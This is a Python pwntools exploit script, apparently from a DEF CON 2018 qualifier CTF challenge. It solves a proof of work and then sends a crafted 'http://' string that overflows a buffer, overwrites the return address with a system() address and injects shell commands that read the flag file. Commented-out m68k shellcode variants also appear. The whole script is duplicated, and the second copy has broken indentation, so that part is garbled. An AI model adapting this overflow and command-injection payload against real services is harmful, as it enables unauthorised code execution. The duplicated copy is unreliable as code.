dwendt/www.py

## www.py
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode = fd.read()
#fd.close()

def p32(v):
    return struct.pack(">i",v)

folder = "/home/heart/dc18/ssz"

p = remote('ddee3e1a.quals2018.oooverflow.io', 31337)

p.readuntil("Challenge: ")
challenge = p.readuntil("n: ").split("\n")[0]
n = int(p.readuntil("Solution: ").split("\n")[0])
shellcode = "\x42\x85\xcb\x89\xd2\xfc\x3e\x64\x4e\x91"
#shellcode = "\xd2\xfc\xdf\x82\x4e\x91"

# stack 0x3fff694
# stack 0x3fff698
# stack 0x3fff54c

win = "/bin/wall /me/flag;"
padding = win#"open /me/flag;"#"/bin/wall /me/flag;open /me/flag;"#"ls -al / > /me/6969; open /me/6969; sleep 30;"
padding = (";"*(263 - len(padding))) + padding
stack_loc = 0x3fff554

#p.sendline('http://' + 264*";" +
#p.sendline('http://' + padding  +
#	p32(stack_loc) +
#	p32(stack_loc + len(shellcode)) +
#	shellcode + ";"+win+";;;;;;;"+win+"; sleep 55;\x00")
#p.sendline('http://' + 0x10d*"A" + p32(0x3fff694) + shellcode)

prewin = ";wall flag;"
win = "/usr/bin/open /me/flag;"
# this needs to be "A" because weird characters will fucking break everything
beforepc = "A"*(260-len(prewin)) + prewin#260#(259-len(win))+win
system=0x050307f8
stack_loc = 0x3fffa10 # a00 = http://aaaa

payload = ('http://'+
           beforepc +
           p32(system) +
           p32(system) +
           p32(stack_loc)+ ";"+
           "`"*(0x200-1) +
           win)
print(repr(payload))

print("solving {} {}".format(challenge,n))
solution = solve_pow(challenge, n)
p.writeline(str(solution))
print("solved...")


p.readuntil("?")
p.sendline(payload)

for i in range(100000):
    print p.readuntil('DEBUG ')
    data = p.readuntil('\n')
    data = data.decode('base64')
    with open(folder + '/%u.png'%i,'w') as f:
        f.write(data)

p.interactive()
	from pwn import *
	from pow import solve_pow
	#from network_util import *
	import struct
	#fd = open("m68k.bin", "r")
	#shellcode = fd.read()
	#fd.close()

	def p32(v):
	return struct.pack(">i",v)

	folder = "/home/heart/dc18/ssz"

	p = remote('ddee3e1a.quals2018.oooverflow.io', 31337)

	p.readuntil("Challenge: ")
	challenge = p.readuntil("n: ").split("\n")[0]
	n = int(p.readuntil("Solution: ").split("\n")[0])
	shellcode = "\x42\x85\xcb\x89\xd2\xfc\x3e\x64\x4e\x91"
	#shellcode = "\xd2\xfc\xdf\x82\x4e\x91"

	# stack 0x3fff694
	# stack 0x3fff698
	# stack 0x3fff54c

	win = "/bin/wall /me/flag;"
	padding = win#"open /me/flag;"#"/bin/wall /me/flag;open /me/flag;"#"ls -al / > /me/6969; open /me/6969; sleep 30;"
	padding = (";"*(263 - len(padding))) + padding
	stack_loc = 0x3fff554

	#p.sendline('http://' + 264*";" +
	#p.sendline('http://' + padding +
	# p32(stack_loc) +
	# p32(stack_loc + len(shellcode)) +
	# shellcode + ";"+win+";;;;;;;"+win+"; sleep 55;\x00")
	#p.sendline('http://' + 0x10d*"A" + p32(0x3fff694) + shellcode)

	prewin = ";wall flag;"
	win = "/usr/bin/open /me/flag;"
	# this needs to be "A" because weird characters will fucking break everything
	beforepc = "A"*(260-len(prewin)) + prewin#260#(259-len(win))+win
	system=0x050307f8
	stack_loc = 0x3fffa10 # a00 = http://aaaa

	payload = ('http://'+
	beforepc +
	p32(system) +
	p32(system) +
	p32(stack_loc)+ ";"+
	"`"*(0x200-1) +
	win)
	print(repr(payload))

	print("solving {} {}".format(challenge,n))
	solution = solve_pow(challenge, n)
	p.writeline(str(solution))
	print("solved...")


	p.readuntil("?")
	p.sendline(payload)

	for i in range(100000):
	print p.readuntil('DEBUG ')
	data = p.readuntil('\n')
	data = data.decode('base64')
	with open(folder + '/%u.png'%i,'w') as f:
	f.write(data)

	p.interactive()